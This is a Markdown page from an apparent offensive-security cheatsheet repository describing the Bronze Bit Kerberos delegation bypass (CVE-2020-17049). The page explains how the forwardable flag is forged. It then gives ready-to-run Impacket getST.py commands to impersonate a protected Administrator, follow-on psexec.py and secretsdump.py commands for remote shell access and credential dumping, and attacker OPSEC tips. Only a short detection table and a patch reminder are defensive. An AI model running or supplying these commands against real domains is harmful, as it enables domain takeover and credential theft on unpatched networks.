daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-18-bronze-bit-attack-cve-2020-17049.md (6622B)


      1 ---
      2 title: "Attack #18 β€” Bronze Bit Attack (CVE-2020-17049)"
      3 description: "The Bronze Bit attack exploits CVE-2020-17049, a vulnerability in the Kerberos Constrained Delegation mechanism. It allows an attacker to bypass the…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "kerberos", "delegation"]
      7 tools: ["Impacket", "Mimikatz", "Rubeus"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #18 β€” Bronze Bit Attack (CVE-2020-17049).md"
     11 ---
     12 # 🟠 Attack #18 β€” Bronze Bit Attack (CVE-2020-17049)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The Bronze Bit attack exploits **CVE-2020-17049**, a vulnerability in the Kerberos Constrained Delegation mechanism. It allows an attacker to **bypass the "sensitive and cannot be delegated" account protection** and the **Protected Users group restriction** β€” two controls specifically designed to prevent delegation-based impersonation attacks.
     19 
     20 ### The Vulnerability
     21 
     22 When a service account with Constrained Delegation performs S4U2Self to get a ticket on behalf of a protected user, the KDC correctly issues that ticket with the `forwardable` flag **unset** β€” preventing S4U2Proxy from working. However, the `forwardable` flag is stored inside the encrypted portion of the ticket, which is encrypted with the **service account's long-term key**. Since the attacker already has the service account's key (it's a prerequisite for the attack), they can:
     23 
     24 1. **Decrypt** the S4U2Self service ticket
     25 2. **Flip the `forwardable` bit** from 0 to 1
     26 3. **Re-encrypt** the ticket
     27 4. **Present it to the KDC** in an S4U2Proxy request
     28 
     29 The KDC sees the `forwardable` flag is set and processes the delegation request β€” **without re-validating whether the user is actually protected**.
     30 
     31 ### Impact
     32 
     33 | Without Bronze Bit | With Bronze Bit |
     34 |---|---|
     35 | Cannot impersonate users in Protected Users group | βœ… CAN impersonate Protected Users |
     36 | Cannot impersonate "sensitive and cannot be delegated" accounts | βœ… CAN impersonate sensitive accounts |
     37 | Domain Admins marked sensitive are safe from delegation | ❌ Domain Admins are vulnerable again |
     38 
     39 ***
     40 
     41 ## βš™οΈ Prerequisites
     42 
     43 | Requirement | Detail |
     44 |---|---|
     45 | **Compromised Constrained Delegation account** | Hash, password, or AES key of a service with CD or RBCD |
     46 | **Target is unpatched** | CVE-2020-17049 patches (Dec 2020 / Jan 2021) must NOT be installed on DCs |
     47 | **Target user is "sensitive" or in Protected Users** | Otherwise, standard S4U2Proxy works without Bronze Bit |
     48 
     49 ***
     50 
     51 ## πŸ› οΈ Tools
     52 
     53 | Tool | Platform | Notes |
     54 |---|---|---|
     55 | **Impacket β€” getST.py** | Linux | `-force-forwardable` flag implements Bronze Bit |
     56 | **Rubeus** | Windows | Manual ticket manipulation possible |
     57 | **Mimikatz** | Windows | Ticket decryption and re-encryption |
     58 
     59 ***
     60 
     61 ## πŸ’» Full Commands
     62 
     63 ### πŸ”΄ Impacket β€” getST.py with Bronze Bit (Linux)
     64 
     65 ```bash
     66 # ── Standard S4U attack (fails on protected users without Bronze Bit) ─────────
     67 getST.py -spn CIFS/DC01.corp.local \
     68   -impersonate Administrator \
     69   -dc-ip 10.10.10.10 \
     70   corp.local/svc_constrained:'Password1'
     71 # Error: KDC_ERR_BADOPTION β€” user is sensitive / in Protected Users
     72 
     73 # ── Bronze Bit bypass β€” force forwardable flag ────────────────────────────────
     74 getST.py -spn CIFS/DC01.corp.local \
     75   -impersonate Administrator \
     76   -dc-ip 10.10.10.10 \
     77   -force-forwardable \
     78   corp.local/svc_constrained:'Password1'
     79 
     80 # -force-forwardable = decrypts ticket, flips forwardable bit, re-encrypts
     81 # Works even if Administrator is in Protected Users or marked "sensitive"
     82 
     83 # ── Using NT hash ─────────────────────────────────────────────────────────────
     84 getST.py -spn CIFS/DC01.corp.local \
     85   -impersonate Administrator \
     86   -hashes :a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \
     87   -dc-ip 10.10.10.10 \
     88   -force-forwardable \
     89   corp.local/svc_constrained
     90 
     91 # ── Use the ticket ────────────────────────────────────────────────────────────
     92 export KRB5CCNAME=Administrator@CIFS_DC01.corp.local@CORP.LOCAL.ccache
     93 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
     94 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
     95 
     96 # ── RBCD + Bronze Bit combo ───────────────────────────────────────────────────
     97 # If you've set up RBCD (Attack #17) but the target user is protected:
     98 getST.py -spn cifs/TARGET.corp.local \
     99   -impersonate Administrator \
    100   -dc-ip 10.10.10.10 \
    101   -force-forwardable \
    102   corp.local/'FAKEMACHINE$':'FakePass123!'
    103 ```
    104 
    105 ***
    106 
    107 ## 🎯 OPSEC Tips
    108 
    109 - **Bronze Bit only matters on unpatched DCs** β€” Microsoft patched this in late 2020/early 2021
    110 - **Always try standard S4U first** β€” only use `-force-forwardable` if you get `KDC_ERR_BADOPTION`
    111 - **Check DC patch level** β€” if the DC is patched, Bronze Bit will fail and you'll need an alternative approach
    112 - **Bronze Bit + RBCD** is a powerful combo β€” bypasses both the write-permission barrier and the protected-user barrier
    113 
    114 ***
    115 
    116 ## πŸ›‘οΈ Detection β€” Event IDs
    117 
    118 | Event ID | Source | What to Look For |
    119 |---|---|---|
    120 | **4769** | Security Log (DC) | S4U2Proxy request for a user that should be delegation-protected |
    121 | **4768** | Security Log (DC) | TGT request associated with the constrained delegation account |
    122 
    123 **Primary detection:** If a user marked "sensitive and cannot be delegated" or in the Protected Users group successfully authenticates via delegation (Event 4624 with constrained delegation indicators), that's a Bronze Bit indicator. The DC **should** have rejected the delegation.
    124 
    125 ***
    126 
    127 ## πŸ”— Attack Chain Context
    128 
    129 ```
    130 [Bronze Bit] ──→ Delegation Protection Bypass
    131          β”‚
    132          β”œβ”€β”€β†’ πŸ”“ Bypasses "sensitive and cannot be delegated" flag
    133          β”œβ”€β”€β†’ πŸ›‘οΈ Bypasses Protected Users group delegation restriction
    134          β”œβ”€β”€β†’ πŸ”— Chain with: Constrained Delegation (#16), RBCD (#17)
    135          β”œβ”€β”€β†’ πŸ“‹ CVE-2020-17049 β€” patched Dec 2020 / Jan 2021
    136          └──→ πŸ’€ Defeated by: patch DCs, monitor for anomalous delegation events
    137 ```
    138 
    139 ***
    140 
    141 > βœ… **Attack #18 β€” Bronze Bit complete.**
    142 
    143 ***
    144 
    145 > 🏁 **Category 2 β€” Kerberos Abuse is now COMPLETE (8/8 attacks).**